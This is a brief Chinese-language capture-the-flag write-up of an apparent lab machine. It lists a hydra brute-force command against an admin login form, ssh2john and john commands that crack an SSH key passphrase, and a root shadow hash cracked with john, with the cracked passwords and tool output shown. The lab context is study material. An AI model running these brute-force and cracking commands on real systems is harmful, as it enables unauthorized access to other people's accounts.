Pasted%20image%2020240227140312

还是这种简单,一眼就知道打80进shell

不会hydra的人有难了
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.18.74 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=invalid" -V
一点错误都不能有
Pasted%20image%2020240227143706

解密rsa 得到rockinroll
ssh2john id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

root:x:0:0:root:/root:/bin/bash
root:$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.:18490:0:99999:7:::
cat 有权限,拉下了破解

└─# john password --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
football         (root)     
1g 0:00:00:00 DONE (2024-02-27 14:54) 8.333g/s 4266p/s 4266c/s 4266C/s 123456..letmein
Use the "--show" option to display all of the cracked passwords reliably
Session completed.